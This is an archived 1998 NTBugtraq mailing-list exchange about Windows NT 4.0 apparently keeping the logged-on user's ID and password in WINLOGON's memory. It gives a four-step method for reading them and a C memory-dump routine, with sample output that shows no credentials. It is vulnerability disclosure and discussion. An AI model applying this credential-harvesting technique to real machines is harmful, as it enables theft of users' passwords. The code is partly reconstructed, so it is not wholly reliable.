Everhart, Glenn

From: Raphael Barber [RaphaelB@FCCTI.CO.UK]
Sent: Friday, December 04, 1998 10:20 AM
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: Win NT 4.0 UserId and Password available in memory

Oooops. Meant to post to the list...

> -----Original Message-----
> From: Raphael Barber
> Sent: Thursday, December 03, 1998 1:43 PM
> To: 'russell.osterlund@ZURICH.COM'
> Subject: RE: Win NT 4.0 UserId and Password available in memory
>
> I've tried this but couldn't find anything that looks like what you
> describe... this is what I got:
>
> Dumping Memory for Process ID 34, 4096 bytes starting at address
> 0x10000 (4096 requested)
>
> 0x00000000 C.O.M.P.U.T.E.R.N.A.M.E.=.R.A.P.
> 0x00000020 H.A.E.L...C.o.m.S.p.e.c.=.C.:.\.
> 0x00000040 W.I.N.N.T.\.s.y.s.t.e.m.3.2.\.c.
> 0x00000060 m.d...e.x.e...L.O.G.O.N.S.E.R.V.
> 0x00000080 E.R.=.\.\.R.A.P.H.A.E.L...N.U.M.
> 0x000000A0 B.E.R._.O.F._.P.R.O.C.E.S.S.O.R.
> 0x000000C0 S.=.1...O.S.=.W.i.n.d.o.w.s._.N.
> 0x000000E0 T...O.s.2.L.i.b.P.a.t.h.=.C.:.\.
> 0x00000100 W.I.N.N.T.\.s.y.s.t.e.m.3.2.\.o.
> 0x00000120 s.2.\.d.l.l.;...P.a.t.h.=.C.:.\.
> 0x00000140 W.I.N.N.T.\.s.y.s.t.e.m.3.2.;.C.
> 0x00000160 :.\.W.I.N.N.T...P.R.O.C.E.S.S.O.
> 0x00000180 R._.A.R.C.H.I.T.E.C.T.U.R.E.=.x.
> 0x000001A0 8.6...P.R.O.C.E.S.S.O.R._.I.D.E.
> 0x000001C0 N.T.I.F.I.E.R.=.x.8.6...F.a.m.i.
> 0x000001E0 l.y...5...M.o.d.e.l...4...S.t.e.
> 0x00000200 p.p.i.n.g...4.,...G.e.n.u.i.n.e.
> 0x00000220 I.n.t.e.l...P.R.O.C.E.S.S.O.R._.
> 0x00000240 L.E.V.E.L.=.5...P.R.O.C.E.S.S.O.
> 0x00000260 R._.R.E.V.I.S.I.O.N.=.0.4.0.4...
> 0x00000280 S.y.s.t.e.m.D.r.i.v.e.=.C.:...S.
> 0x000002A0 y.s.t.e.m.R.o.o.t.=.C.:.\.W.I.N.
> 0x000002C0 N.T...U.S.E.R.P.R.O.F.I.L.E.=.C.
> 0x000002E0 :.\.W.I.N.N.T.\.P.r.o.f.i.l.e.s.
> 0x00000300 \.r.a.p.h.a.e.l...w.i.n.d.i.r.=.
> 0x00000320 C.:.\.W.I.N.N.T.....N.N.T.......
> 0x00000340 ................................
> 0x00000360 ................................
> 0x00000380 ................................
> 0x000003A0 ................................
>
> using the following code (FTWCR):
>
> #include <windows.h>
> #include <stdio.h>
> #include <ctype.h>
>
> /* id, base and size come from the caller: the target process id, the start
>    address and the byte count (34, 0x10000 and 4096 in the run above). */
> void DumpProcessMemory(DWORD id, DWORD base, DWORD size)
> {
>     HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, TRUE, id);
>     if (hProcess)
>     {
>         void* lpBaseAddress = (void*)base;
>         BYTE* lpBuffer = new BYTE[size];
>         DWORD dwNumberOfBytesRead = 0;
>         if (ReadProcessMemory(hProcess, lpBaseAddress, lpBuffer, size, &dwNumberOfBytesRead))
>         {
>             printf("Dumping Memory for Process ID %d, %d bytes starting at address 0x%X (%d requested)\n",
>                    id, dwNumberOfBytesRead, base, size);
>             /* 32 bytes per row; a byte prints as itself if isgraph() holds, otherwise as '.'.
>                The loop bound was lost in the archived copy; dwNumberOfBytesRead is assumed.
>                Note that isgraph('\0') is false, so the '_' branch can never be taken. */
>             for (DWORD n = 0; n < dwNumberOfBytesRead; n++)
>             {
>                 if (n % 32 == 0) printf("\n0x%08X ", n);
>                 printf("%c", isgraph(lpBuffer[n]) ? (lpBuffer[n] == '\0' ? '_' : lpBuffer[n]) : '.');
>             }
>             printf("\n");
>         }
>         else
>             printf("Error %d.\n", GetLastError());
>         delete[] lpBuffer;
>         CloseHandle(hProcess);   /* the posted snippet did not release the handle */
>     }
> }
>
> there's no more readable text in the rest of the page, and I
> couldn't read beyond that....
>
> This was a very quick check, so I'm sure I've overlooked
> something.... could you give more details of your test?
>
> Raphael
>
>
> Russ wrote:
>
> I have "stumbled upon" something peculiar concerning Windows NT 4.0
> Workstation security. It seems that the userid and password
> remain in memory after a user has successfully logged on.
> Specifically, the memory space associated with WINLOGON.EXE
> (the memory block containing the environment space) contains the
> values "lMprNotifyUserName=xxxx" and "lMprNotifyPassword=yyyy",
> where "xxxx" is the userid used to issue the logon to the
> workstation and "yyyy" is the password.
>
> Is this widely known? It seems that basic security on a workstation
> has been compromised by this behavior.
>
> The algorithm used to discover the password and userid is the
> following:
>
> 1) Locate and determine WINLOGON's process id.
> 2) Open up this process for PROCESS_QUERY_INFORMATION and
>    PROCESS_VM_READ access.
> 3) Issue a ReadProcessMemory on the address 0x00010000 for one page.
> 4) Scan the copied memory area for the strings "lMprNotifyPassword="
>    and "lMprNotifyUserName" and display what comes after.
>
> Thank you in advance for your interest.
>
> Russ Osterlund